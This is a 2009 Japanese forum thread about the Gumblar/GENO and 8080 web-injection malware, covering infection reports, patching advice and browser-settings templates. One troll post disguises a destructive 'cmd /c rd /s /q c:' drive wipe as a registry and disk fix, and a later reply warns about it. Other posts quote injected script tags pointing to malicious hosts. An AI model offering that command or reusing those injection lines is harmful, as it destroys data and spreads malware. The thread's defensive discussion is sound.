1 :
名無しさん@お腹いっぱい。 :
2009/12/01(火) 04:01:23
2 :
名無しさん@お腹いっぱい。 :2009/12/01(火) 04:02:55
3 :
名無しさん@お腹いっぱい。 :2009/12/01(火) 04:06:02
4 :
名無しさん@お腹いっぱい。 :2009/12/01(火) 04:11:44
7 :
名無しさん@お腹いっぱい。 :2009/12/01(火) 13:26:03
いちもつ しかしだな、前スレ(22)以前の物はいらないと思う。
スレ違いっつーか板違い ダウソ板でやれ
11 :
名無しさん@お腹いっぱい。 :2009/12/03(木) 16:43:07
それはただの誤検出
Shareの奴だろ。関係ないからダウソ板に帰れって。
デタラメもいい加減にしろよ。
> Symantec 1.4.4.12 2009.12.03 Infostealer.Kenzero
Illegal Games? Pay the Price?Publicly!
ttp://www.symantec.com/connect/blogs/illegal-games-pay-price-publicly Infostealer.Kenzero primarily arrives in the guise of setup.exe,
which in this case is a fake installation file for Japanese pornographic games
that are circulating around the file-sharing network “Share.”
Several pornographic games have been reported to include this malicious setup.exe file.
____ / \ / _ノ ヽ、_ \ / o゚((●)) ((●))゚o \ ほんとはShareでエロゲを違法ダウンロードしたんだお… | (__人__)' | \ `⌒´ / ____ / \ / _ノ ヽ、_ \ / o゚⌒ ⌒゚o \ でも恥ずかしくて言えないお… | (__人__) | \ ` ⌒´ / ____ /⌒ ⌒\ /( ●) (●)\ /::::::⌒(__人__)⌒::::: \ だからGENOのせいにするお! | |r┬-| | \ `ー'´ /
Win7でも感染報告があったらしいけど、それでもVistaだけは安全なの?
知らないけど報告は間違ってる場合もあるからな 以前も感染するわけ無いのに報告あったから
ちょっと知識がある人は感染しない 感染したと言ってる人は本当かどうかは別として知識がない だから報告も信憑性がない
とりあえず前スレ埋めてこようぜ
22 :
名無しさん@お腹いっぱい。 :2009/12/05(土) 12:11:38
Vistaや7で感染したって人はUAC切ってたんだろ
以前のGENOはバージョンチェックしてたからUACは関係ない それでも感染したとか言う人がいた
さすがエロサイト動画サイト大好き日本人
28 :
名無しさん@お腹いっぱい。 :2009/12/06(日) 10:42:39
画面が真っ黒になるわけじゃないけどポインタだけになって何もできない もちろんセーフモードでも起動できない でも5回くらいやってるとまた何事もなかったかのように起動する
>>29 ウイルス感染?それともハード関連の不具合かな?
OS他PCスペック等が判らないからなんとも言えないが、
簡易検出の「チェックディスクコマンド」を試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
ありがとう。すっぱり綺麗になった。
誰もひっかからないとは思うが一応書いとく >30を実行するとフォルダが全部削除されるから気をつけろ とりあえず通報しといた
>>32 アドバイスありがとう。
だが大丈夫だ。今時のゆとりは(俺含め)、
こんなコマンドなんざ面倒くさがっていちいち打ったりしない。
前スレ埋めてきた。 ついでに新型の情報を転載っと。 -- 962 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:49:43 Trojan-Downloader.JS.Gumblar.x 確認 www●jwell●com 963 :名無しさん@お腹いっぱい。:2009/12/03(木) 15:24:10 jsに突っ込まれてるね。 /js/font.js /js/base.js /inc/prog.js
結局フラッシュだかadobe等更新しとけばいいだけ
だか、等 とか言われるとスゲー不安
日常使うソフトなんか限られるわけだから 全部最新版にしておけばいい スクリプト防いだ!スゴイ!よりは効果があるわ
日本語でおk
こんなスレでまじになっちゃってどうするの
IE使うなとか馬鹿か MACウイルス無いとか威張ってるのと同じだな
unDonutとTheworldとIE7を使い分けてるぜ
Windows使わなければ何も怖いことはない。
パソコン使わなければいいじゃん。
とにかく ・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。 はなおせよ それが嫌ならMacつかいましょうもテンプレに入れろカス
火狐野郎がNoScript宣伝したかっただけ IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ 他人に強制するほどの根拠があるかね Windows使うの辞めろよ 使い勝手はIEコンポブラウザならかわらんし
ここまで全部俺
Firefox使いだがNoScriptはいろいろな意味で嫌い。
ここまでScript
火狐野郎が
こんにちはGoogleです
Firefoxつかいが頭おかしい事がまたあかるみになったのか
オープンソースがすごい? リナックスでも使ってろ糞狐
Windows使ってんだからIE使うのが普通だしな
保守おつかれさまです
なあに馬鹿なの
何使おうが自由だ 押し付けがましいんだよ Firefox厨
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。 ※よくわからない人は「Firefox+NoScript」を導入しましょう。 よく分からない奴がそんなモン使うわけねえだろきめえ
この子なんでこんなに必死なの
必死だなこんな糞スレで
すごいね 一人で何回も書き込んじゃってw
Firefox使えとかうぜえ
俺の自演だけど毎回茶々いれてくる馬鹿暇人が混じるから迷惑だ
どっかの誰かが作ってちょっと突っ込まれたらすぐいじるような糞アドオンつかうのなら IEでスクリプト全オフでブラウジングしたほうがまし
GENO対策なんか更新しとけばオワリ スレ伸ばすにはにはNoScriptがいいとか書いてテンプレwいじれば ブラウザ戦争が勃発
FirefoxだけプラグインのNoscript使えとか書いて 他のやる気なさすげえ
糞チェッカーは糞
67 :
名無しさん@お腹いっぱい。 :2009/12/09(水) 15:36:17
NoScriptなんかでいばるより更新しとけってこと
10,0,32,18からかわんねえぞ
一回アンインスコしないと
firefox/opera版はプラグイン形式で簡単だからいいね いつも、普通にコントロールパネルから通常アンインストール→最新版をインストールでやってる IEはエンジン部分だけ2chブラウザで利用しているが完全放置 flashも入れていない
しらねえよカス
火狐野郎はなにかにつけてどうでもいいことにケチつけるな
アンインストールする必要ないな別に
IEも他のも自動で変わるからアンインスコとかいらんね
またIEアンチが頭おかしい理屈こねたのか
このスレ☆10ぐらいから500レスは俺だな
とにかく ・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。 はなおせよ それが嫌ならMacつかいましょうもテンプレに入れろカス
81 :
名無しさん@お腹いっぱい。 :2009/12/10(木) 13:25:33
>>80 IE(笑)は、スクリプト以前にActiveXがうんこ
Netscape(笑)Pluginほどでは(笑)
糞火狐がまたGENOと関係ないこといってら
火狐野郎がNoScript宣伝したかっただけ IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
いまだActiveXが危険とかいってんのか どんだけー
自分で撃ってくれと弾が入った鉄砲を渡したあほ 鉄砲が危険だから死んだと遺族が訴えた
オープンソースがすごい? リナックスでも使ってろ
とにかく ・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。 はなおせよ
>>57 まったくその通りです。
むしろよくわからない人は「NoScript」を導入しないで下さいだと思う。
ここはブラウザの優劣を競うすれじゃないんだし、並列に扱えばいいじゃない。
■ブラウザでスクリプト使用を基本無効に設定
ここに
>>84 さんの言うIEの設定方法を書き加えて
これを削除する
↓↓↓
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の
用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。
■ブラウザでスクリプト使用を基本無効に設定 このくだりは全部いらねえよ 更新だけしとけばいい
ツール(T) -> インターネットオプション(O) -> 「セキュリティ」タブ -> 「レベルのカスタマイズ」ボタン -> 「スクリプト」 の「アクティブスクリプト」で「無効にする」を選択。 でjavascript無効 セキュリティのインターネットのゾーンを基本全部無効にして 信頼済みサイトに追加していけばいいだろう noscriptとか使うのと同じ感じになる IEコンポ系ではワンタッチで有効無効を切り替えられるのもある まあスクリプト使用!危険 そんなヒステリーにつきあってられるかってのが実際だ
糞チェッカーはうんこ
>89 荒らしに構うな
>>信頼済みサイトに追加していけばいいだろう これが大変なんだけどね…
真するー出来ないやつがきたな
すくりぷと使用しないとか強い意志があるならそれでいいだろ NoScriptなら簡単に追加できる!!馬鹿かと
>>1-96 ここまでNoScriptをスルーできない人でお送りしました。
89と97は俺じゃない
むしろIE版noscriptつくれ
g'nomeさんて誰だよ そんなやつがどうだろうが知るかぼけが
また火狐野朗が他の関係ないこといいだしたのか
>>NoScriptの設定で<IFRAME>を禁止にしておけば… NoScriptしかしらんのか
何使おうが自由だ 押し付けがましいんだよ Firefox厨
IEでの対処方書いて テンプレ新しく作れよ
■ブラウザでスクリプト使用を基本無効に設定 の項目より下はいらん
Windows以外のOSの使用を検討してください。 て書けよ
■ブラウザでスクリプト使用を基本無効に設定 InternetExplorer ツール→インターネットオプション→セキュリティ→ レベルのカスタマイズ→スクリプトのとこ全部無効にチェック (ブラウザ再起動をしないと適用されない) Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す safari 編集→設定→「JavaScriptを有効にする」のチェックを外す Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→ デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション もしくはLunascape5を使うといいようです。 Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす ※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で 切り替え可能になるのでいざという時便利
(ブラウザ再起動をしないと適用されない)なんてのは嘘だね
■ブラウザでスクリプト使用を基本無効に設定 ・InternetExplorer ツール→インターネットオプション→セキュリティ→ レベルのカスタマイズ→スクリプトのとこ全部無効にチェック ・Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す ・safari 編集→設定→「JavaScriptを有効にする」のチェックを外す ・Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→ デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す ・Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション もしくはLunascape5を使うといいようです。 ・Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす ※FireFoxの場合、プラグイン「NoScript」のインストールが推奨されているようです また、「IE Tab」をインストールすればIEのみに対応したサイトの表示も手動で 切り替え可能になるのでいざという時便利 ・Google Chrome -disable-javascriptで起動。
MSの社員じゃないあんたはさっさとWindowsなんぞ使うのやめたら はるかに安全で使いやすいらしいぞ
Macとか
WebBoyでも使ってろ
g'nomeのとこ、ここではあんま話題にすんな。いろいろあったんだから・・・ 自分が参考にする分にはご自由にどうぞ
またそんな釣りレスして
なんか面倒くせえな、もう携帯で見るわ
そこまでしてNoScript否定したいのは何故だ? アフィで稼いでいる奴が必死になってんのか?
いつもの保守ツールくんだから気にしなくていいよ
アフィやってるヤツならAdblock Plusが敵だろ サードパーティのスクリプトやオブジェクト全部読み込まないとか出来るけど NoScriptやRequestPolicyほど融通きかんがな
今回FlashPlayer9の更新もあったのな もう無いのかと思ってたぜ
NoScript否定したい? 糞火狐が他否定してるんだろカスが
必死こいてテンプレ変えた奴がよくいう
fox房はよくおしつける 使いやすさは人それぞれだし セキュリティなんぞ努力のおかげでシェアあがって危険ブラウザ 破綻まみれのセールストーク聞き飽きた
話が長いな その話はもういいよ
はやく900までいかなあかんもんねえ(笑) 1が削除依頼出して建てなおすならともかく
IE(核爆笑)
また召還呪文唱えてるのか火狐
Windows(核爆笑)
Gumblarご乱心?
tp://www●malatyabirlikgazetesi●com/
<script src=h
ttp://orientdesigns ●co●in/images/favicon●php ></script>
↑
色々な場所に沢山入ってるんだが・・・
なにそれこわい
www●senbaskasin●net/ms_word●asp?haber=246 「ファイルタイプ: Microsoft Word」 こんなのも引っ掛かるようになってきた
136 :
名無しさん@お腹いっぱい。 :2009/12/13(日) 05:14:50
ビスタだけどジェノに感染したかも・・・ デスクトップ画面がブラックスクリーン(セーフモードでの起動は可能 これもうクリーンインストールしか手は無いの? それ以外の回復手段あったら教えてくれ・・・
>>136 クリーンインストール推奨だが・・・
>>10 でどう?
念のためすべてのツールを試してみるとか
トロイの木馬『Buzus』、感染サイトは12万5000以上に
11月下旬に始まった極めて複雑な新型 SQL インジェクション攻撃により、
すでに12万5000以上の Web サイトが、クレジットカード情報や銀行口座などの
情報を収集することで知られるトロイの木馬『Buzus』に感染している。
インターネットのセキュリティおよび監視を手がける企業 ScanSafe によると、
この攻撃はまず、埋め込まれた iframe が「318x.com」というサイトから
第1段階の悪質なコードを読み込むのだという。
その後、ユーザーからは見えない一連の iframe およびコードリダイレクションが、
「windowssp.7766.org」サイトから問題のあるコード「Backdoor.Win32.Buzus.croo」を
密かにインストールして完了する。
http://japan.internet.com/webtech/20091211/12.html
tp://www.forest.impress.co.jp/lib/inet/security/antiadspy/secuniapsi.html
141 :
名無しさん@お腹いっぱい。 :2009/12/13(日) 12:42:12
uac切ってたんじゃね?
新型によるUACスルーが噂されているがどれも明確なソースがないんだよね
>>143 確かに調べても見つからないね
対象なるとしたら7の方だろうね
ユーザー数適にw
>>138 <div class="pic_content">
<img src="/XXXXX/XXXX/XXXXX/XX/XXXXX●<script src=
http://7o8 ●net></script>
a href、imgとかにも寄生してるから
相談させて欲しい。
カスペさんが、とあるサイトで反応したのでソースを確認したら
<scipt sc=htt//apiwachara.com/images/gifimg.php ></script><body>
というものが入っていた。
ほぼ黒だと思ったので管理人に連絡。
旧GENOの対処だとだめなこと、ウィルスソフトもダメなこと、
カスペインストかニフティのオンラインスキャン等の手段があること、
レジストリ確認(
http://xx2zz.blog77.fc2.com/blog-entry-131.html )法があることをメールに記載。
インデックスのみのこしてサイトを削除してくれたが、
・覚えのないタグが入っていた
・削除した
・PCに感染はみとめられない
・感染したわけではないが、念のため
との記載。
その告知ページに上記タグが埋め込まれてるあたりもうどうしたら。
GENOウィルスチェッカーみたいなものが反応してくれたら、信じてもらえるかもと思って
http://6130.web.fc2.com/xxx/ で確認してみたんだけど、「安全です」との結果が出てくる。
新しく作ったHTMLに寄生されている以上、黒で間違いないと思うんだけど、
簡単にわかってもらえる方法はないだろうか?
>>148 前スレより引用。
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/11/01(日) 23:53:21
>>610 どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ
151 :
148 :2009/12/14(月) 21:04:11
>>149 わざわざひっぱってきてくれてありがとう。真理だな。
もう一回メールして理解してもらえないようならそうするわ。
>>150 レジストリの隠蔽もするとは…自分もよくよく読んでいなかった。指摘ありがとう。
教えてもらったことをふまえてもう一回メール送って説得してみるよ。
>>151 ああそうだ
そのサイトの名前かURLでググってみると↓こういうの出ないかな
「このサイトはコンピュータに損害を与える可能性があります。」
出るようなら危険なサイトと認識されているわけだから
Googleの知名度で説得の材料になるかも・・・
カスペはゲノには容赦ないな。
156 :
148 :2009/12/15(火) 00:23:26
おおお、一通り勉強しなおしてもどってきたら、さらにアドバイスが。
ありがとう!グーグル先生にも問い合わせてみるよ。
>>153 アドレス記入だとエラーが起こるんだけど、
ひょっとしてわざわざ148のウィルスをDLして確認してくれた?
もしそうなら、ほんとありがとう。
そうでない場合は、是非やりかた教えてください。
>>156 本体はわからんけど攻撃スクリプトだけもらった
アドレス記入ってどういうこと?
直接ブラウザで見に行くのはやめといたほうがいいよ
404とかが返ってきたのならIP制限で拒否されたんじゃね
158 :
148 :2009/12/15(火) 02:11:40
>>157 Virustotalのアップロード部分に、.phpのURLを入れてみた。
size0で、対応してくれなかったから、パソコン内のファイルじゃないとだめなのかと思って。
「攻撃スクリプトだけもらう」のがどういうことかわからないし、
今の自分には無理だということはわかった。
何度もありがとう。
名無しにもどります。
>>153 gumblarはphpでアクセス制御をしていて
同一ホストからの複数回のアクセスには404を返す。
aguseその他のゲートウェイ(つまりゲートウェイのIP)で
2回チェックするとそれ以降は無害判定になる。
(今は亡きソースチェッカーではproxyにチェック入れて引っかけていた)。
何度も何度も言ってるんだけど。
追記。1回踏んじゃった後であらためて検体を拾いたいのなら モデムリセットしてIPを変えるかてきとーなproxyを刺すとかすればよろし。
声優個人の中村繪里子スレより。
ラジ関のアニラジサイトanitama.comがやられている模様
> 282 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:48:43 ID:TnBI7JUt0 Be:
> ありがとう、その辺が妥当かな?
> ちと聞いてみる。
>
> とはいえ、xnxx-com.nu.nl.w3-org.goldgolfbag.ruなんてドメイン使うってことないよね?
> 283 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:56:33 ID:7Tpx8wr40 Be:
> よくわからんけどキャッシュの方のソース見ると最後の一行が入ってないね
> 299 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:50:45 ID:zA943d8b0 Be:
> anitama.comのページ全部やられているような気がする。
> 300 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:52:16 ID:TnBI7JUt0 Be:
>
>>297 > Adobe Readerを更新してなかったスタッフがいたんじゃないかなぁ。
> Javaと一緒にChangeLog.pdfってのも読み込ませようとしてたから、まず
> その辺かなという気がするよ。
http://changi.2ch.net/test/read.cgi/voiceactor/1260365719/
先に書き込みありましね、勝手ながら注意喚起のため緊急浮上でage
アニやまのHPにアクセスしたらおかしくなった… アンチウイルスソフトいれてないんだけどヤバイですか?
Adobe Readerつかうより Foxit Readerの方が安全と言えるだろうか
>164 >1の「更新」関係で抜けがあったらご愁傷さま
>>165 FoxitReaderにも似たような脆弱性なかったっけ
勘違いならスマソ
SecuniaがAdobe Reader危ないとうるさい
このウイルスって、同一LAN上のPCは感染しますか?
アニ●マをネットブック(Puppy Linux4.3.1-jp SeaMonkey 1.1.18)で表示していて(ネトラジを聴いていて)、
他の作業を同一LAN上の他のPC(WinXP 一応
>>1 の対応は済)でやっていたのですが。
念のためネットブックは隔離、様子見中。
…めちゃくちゃおもたくなってきた。 まうすかーそるも長ゆっくりしか動かない
アニオタがダイ終結してるのか とりあえず再インストールして >1の更新関連をしておけ
>>170 Linuxでは感染しないので同一LAN上にWindowsがあっても大丈夫
またLAN上で動作するようなことは確認されていない
アップデートで対策をしているなら安心していい
174 :
170 :2009/12/15(火) 23:03:14
>>173 レスとんくす。
安心しました。Linuxでは感染しないのですね。
ほっとしました。
ちなみに
>>171 は自分ではありません。
>>175 乙
このスレの住民ならAcrobat Javascriptは切ってるだろうから問題ないな
>>158 > Virustotalのアップロード部分に、.phpのURLを入れてみた。
これは無理
> パソコン内のファイルじゃないとだめなのかと思って。
そういうことです
アップロードしたファイルを確認できるのはそのファイルを持っている人だけ
VirusTotalからDLは不可能
DLできちゃったら危ないからね
>>178 本体じゃないから反応しないだろ
ノートンで行くと反応した
>>180 なるほど本体バイナリは同じか
スクリプトが大きく変わったんだな
>>161-163 これはいわゆる8080系イジェクションで、gumblar(geno)じゃないよ。
使う脆弱性はおなじみFlashやAcrobatなので対策は同じ。
>>176 ついでに。
ttp://www.shadowserver.org/wiki/pmwiki.php/Calendar/20091214 Right now only 5 out of the 41 different Antivirus vendors used by Virustotal are detecting this threat.
Even then their detection appears to be generic and is not currently specifically detecting this exploit.
The 5 vendors to detect the threat are:
(McAfee-GW-Edition) *note this is not the same as McAfee Desktop or Mail Server Edition
(eSafe)
(NOD32)
(AntiVir)
(Kaspersky)
補足するとMcAfeeのGWは旧Webwasherで、McAfee+何かという構成で
VirusTotalのはMcAfee+AnviVir。実質4ベンダー。
eSafeがKasperskyオプション付きなら実質3ベンダー。
>>184 さっき誤ってアニたまに飛ぼうとしてカスペ先生が遮断してくれたとこだぜw
まあ砂箱内のブラウザで、js切った状態だったから飛んでも問題なかっただろうが
いちおanitamaのスクリプトは各社に提出済みです。 バスターはトレンドマイクソの鯖がおかしいんで送れてないけど。
>>185 スレチではあるが同じ脆弱性も突いているウイルスだから
ここでもアリのような気もする・・・ウイルス総合スレなんてないしな
アニヲタ撲滅運動か??
>184 今はカスペだけか、恐いな
検出の仕方にもよるからカスペだけとは限らない 現にノートンでも検出する
アンラボ?とかいうので駆除してみたんでもう大丈夫ですかね??
>>188 ページ改竄の総合情報スレ的なものってないのかな?
ちなみにアニたまは公式アナウンス来た
一応あのスクリプトは取り除いたみたいだが、まだ調査中の模様
完全に安全になりました、とは言えないな・・・
>>193 アニたまに関しては、今のところスレチだ他でやれ的なレスも
ないようだからここでやってもよさそうだ
しかし、ページ改竄の被害が身近になってくると
総合情報スレ的なものが欲しくなるな
新しく立てても過疎りそうだから個人的には
次スレはこれを考慮に入れたスレにしたいものだが
スレチだ他でやれ
ああいうとやっぱりこういうレスがつくよなw
アニたまのは音楽ファイル自体は大丈夫なのかのう。
>195 アニたまはいい加減スレチとして、確かに>193の「インジェクション総合スレ」っぽいのは見たい 欲張って「マルウェア・ウイルス総合スレ」にしちゃうと、分量・速度的にキリが無さそうだしな
ブラウジングウイルス対策総合スレ
>>199 たしかに欲張ると質問が押し寄せて収拾つかなくなりそうだ
ただ、範囲を絞りすぎると過疎が怖いしな・・・
検索で見つけやすいスレタイやテンプレの問題もあるが
【Gumblar】Webウイルス対策総合スレ【8080】
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】 ではどう? GENOと改竄を入れた方が分かり易いと思う。
なんか建てるならブラウザ戦争おこさないようにテンプラ気をつけろ
ここ来る連中にちょろいやつはいないだろうからもうここイラネ
【Gumblar/GENO】Web改竄ウイルス情報総合スレ【8080】 ちょっと長いけどこれでどうだ? 情報って言葉を入れることであくまでも第一報やそれに準じる大まかな情報のみ扱う で、被害が大きかったり細かい対策で情報量が増えていくようだったら そのウイルスごとに別スレを立てて誘導していくって感じ
内容はこんな感じでどうだろ? 一応このスレの改変してテンプレも作っているが 自分も詳しいわけではないのでアップデート対策と Gumblarについてしかまとめていない 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです ウイルス情報・対策方法・脆弱性情報などをお願いします 被害が増加しているようなら別スレを立てて誘導してください 現時点でGumblar(GENO)、8080、JustExploitなどのインジェクションが流行しています 基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう *** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します *** あとブラウザについてだが ■ ブラウザでJavascriptの使用を基本無効に設定 ・Internet Explorer ツール → インターネット オプション → → セキュリティ・タブ → このゾーンのセキュリティのレベルを「高」に ・Firefox NoScriptを導入する ・Google Chrome -disable-javascriptで起動。 ・Opera ツール → クイック設定 → 「JavaScriptを有効にする」のチェックを外す こうしているが他にいい案はないかな
>>207 だからそういう風に書くから粘着馬鹿につけ込まれるんだって。
個人的にはブラウザ関連の記述はあえてテンプレからは外すようにした方がいいと思うけど
どうしても入れたいなら
■ ブラウザでJavascriptの使用を基本無効に設定
・Internet Explorer ツール → インターネット オプション →
→ セキュリティ・タブ → このゾーンのセキュリティのレベルを「高」に
・Firefox ツール→オプション→コンテンツ→ 「JavaScriptを有効にする」のチェックを外す
・Google Chrome -disable-javascriptで起動。
・Opera ツール → クイック設定 → 「JavaScriptを有効にする」のチェックを外す
とした方がいい。
なんでわざわざIE厨の機嫌取らないといけないんだよ
まあでもJavaScriptの無効方法のテンプレなのに、NoScriptが対処方法ってのはおかしいな ブラウザ単体で切ること自体はできるんだから
なんでわざわざ火狐厨の機嫌取らないといけないんだよ
こういうのがいるからだろ
IEでも火狐でも、どーでもいいわい
214 :
名無しさん@お腹いっぱい。 :2009/12/17(木) 10:27:53
>>208-213 ・WebブラウザのJAVAScriptを切っておく
※切り方はググれカス(勝手に調べて下さい)
これでどないだ?(苦笑)
共通の敵がいるのになんで内紛せにゃならんのだ
216 :
207 :2009/12/17(木) 12:21:34
ご意見どうも ブラウザに関しては利便性の問題もあるので 応用的なことは外すほうがいいか あまり代わり映えしないが扱う範囲が広くなるからよしとして アップデートとGumblarくらいのシンプルなものにするかね あとは誰か詳しい人が追加してくれるだろうし それと ・QuickTime・RealPlayer等の更新 ・VirusTotal・VirSCAN.org ・サイトチェッカー ・オンラインスキャン このあたりは入れていないがいいかな? とりあえず立てるにしてもいろいろ意見は欲しいところ
>>700 その共有ボタンに登録した情報から動向を探るのが本当の目的だろ
いつもの収集作業だな
ごばったけど過疎ってるしまぁいいか…
過疎ってないよ
動きがないと過疎るからなあ 総合スレは次になにかあったときのほうがいいかもな・・・
水面下で着々と怠惰な情弱共が喰われていってるくらいだな 事前に最低限の対策をしていれば当面の間は問題ない
今GENOサイトがメンテナンス中なんだが、 また何かあったのか?と疑ってしまう・・・
メンテナンスはメンテナンスですしおすし
224 :
名無しさん@お腹いっぱい。 :2009/12/20(日) 21:35:28
よく分からんが、恐らく感染してるっぽいが、userフォルダをusbメモリに退避して、osクリーンインストールでおk?
その退避したファイルが〜ってオチですね
USBメモリが別のにやられてそうだよね
HijackThisのログで拾ってくれないかな? 感染した人、試してみて
>>227 VirtualBox上で感染させたちょっと古いやつだけど、HijackThisのログでは拾えなかった
thx やっぱり駄目か・・
つかワクチンで対処ができないとかjavaって欠陥ソフトやん、どうにかしろや
ワクチンとかアンチウイルスとかが既に幻想 UACも、ウイルス系の8割が突破、通常アプリの8割がブロック 自分の責任じゃないとか言ってるうちにWindows滅びますぜ ゲイツさんよ
>231 MSEを無料で作る程度には、責任感じてる気もする 肝心のMSEの性能はシラネ
MSEやその前身のOneCareもどこかよその企業をいくつか買収しただけだったりする。
234 :
名無しさん@お腹いっぱい。 :2009/12/22(火) 23:37:25
ソープ板から すまんこ。 アニたま系と同じやつだとおもうのだけど(ソープ店HP) //santafe.santafe-group.com/index.html 内の最後の方のアクセス解析スクリプト //santafe.santafe-group.com/acc/xenoLogger.js が乗っ取られてるみたいで ロシアにご案内されてしまう。 地味に被害が広がっていて、管理者側も依然手を打ってない模様。 専用スレでも立ててage放しにして警告しといたほうがいいのかな? 3行ほどでアドバイスいただけないかしら。
235 :
名無しさん@お腹いっぱい。 :2009/12/22(火) 23:38:45
>>231 ゲイツは08年6月27日に退職しとるがな
236 :
名無しさん@お腹いっぱい。 :2009/12/22(火) 23:56:55
>231 OS・アプリ・Flashの更新関係は全部チェック、ブラウザも極力最新版を 無料でもセキュソフトは必須、未対策は感染を広げる(偽セキュソフトに注意) 不安ならブラウザとPDFソフトのJavascriptはOFF、後者は常時OFFでもいい ほい、3行 できる・やるべき対策はGumblarと同じ
>237は>234宛だった
言ってることは正しいんだが、安価ぐらいちゃんと打とうよ・・・ しかしGNU GPLで始まるスクリプトのインジェクション、じわじわと拡がってるみたいね もう1個ぐらい有名サイトが陥落でもしたら、総合スレ立てても良いような
240 :
234 :2009/12/23(水) 04:41:13
>>236-239 色々ありがとう。
メディアでの記事も参考になったし、Adobe Readerでjavaスクリプトとかあるの知らなかった。
最後にもうひとつだけ質問させて。
コレって、サーバーに侵入されて書き換えられてるの?
それとも、保守用のPCが何らかの感染しているの?
両方あり得るし、それは管理者じゃないとわからん。
管理者のPCが感染 →鯖の管理アカウントが漏洩 →鯖に仕掛けられる →それを見た別の管理者のPCが感染 の永久ループだろ ちなみに、adobe readerは全バージョンセキュリティホール放置中、対策版は恐らく来月中旬 攻撃コードの作り方が簡単過ぎて笑ったので、年末年始に流行りそうな予感
245 :
234 :2009/12/23(水) 09:14:51
>>241 ,242
ありがとう。
>>239 さんの通りじわじわ拡大してるようですね。
件の管理者も早く気付いて欲しいところです。
246 :
名無しさん@お腹いっぱい。 :2009/12/23(水) 13:16:32
管理者自身、geno技術がすごすぎて手が打てないんだろ
この際、javaやめてnet frameでええよ
249 :
名無しさん@お腹いっぱい。 :2009/12/23(水) 15:15:27
250 :
名無しさん@お腹いっぱい。 :2009/12/23(水) 15:36:53
ここも凄い事になってるなw tp://www●cafekamrans●co●uk/
>>249 -250
どんな感じなんだ
一回見てみたいんだがチキンだから見れない画像うpしてください^q^
Firefoxで頭にview-source:付ければいいだろ
>>249 code1は8080系だね。前はGNU GPLとか書いてた奴。
上げてください^q^
自分で見れないレベルなら見てもわからんと思うよ
久々に見にきてみれば、JRもGENOか
検索だけじゃなかったのか
スペル覚えにくいけどGumblarね
>>256 ほっといたらいい
URLしか貼り付けれない奴らだから
GENO怖くて4月からもうずっと専ブラで2chとふたば見るだけのネット生活だ…
ここまでGENOで定着してしまうとはね・・・アメリカの企業だったら名誉毀損で訴訟起こすレベルw そりゃインジェクションされたGENO側が悪いのも分かるけどさ・・・ JRが真っ先にやられてたらJRウイルスとでも言われてたのだろうか?
ガンプラに見えてしまわない
機動戦士Gumblar
vistaでDaonol感染した。 UAC切ってたからだと思う。 7のインストールディスクのコマンドプロンプト使ったが、midi9がないので、更なる亜種みたいだわ。 復元ポイントに戻ればいいみたいだが、生憎vistaのインストールディスクがなくてなおしようがない…
8080系って電車みたいだな
>>273 ありがとう、試してみる。
>>276 ん〜、削除しようとしても見つからないって言われるし、展開してみても見つからないんで、とりあえず
>>273 が教えてくれたのを試してみる。
今度はJREか…
>279 3秒くらい、JR東日本とJavaランタイムのどっちか混乱した
今度の8080系がアニたまウイルスと命名されないか、心配だぜ なんかso-netの記事見てると、分かりやすくするためだろうがやけにアニたまって言葉使ってて・・・
ここで命名しない限りそれは無い
ちゃんと閉鎖・発表してるのに命名されるのは可哀想だ
ついにきたか さてと、どうすっかなぁ 年末年始休暇の間に職場の全PC設定は勘弁してほしいな
287 :
名無しさん@お腹いっぱい。 :2009/12/26(土) 11:43:36
AdobeReaderの設定ってユーザーごとなのね。めんどくさ。 例 AcrobatJavaScriptの設定 HKCU\Software\Adobe\Acrobat Reader\9.0\JSPrefs bEnableJS (HKLMには無い) ドメイン環境下ならポリシーでばら撒けばいいのか?
>>288 無いなら無いでHKLMにキーを作ってしまえばいいのでは?
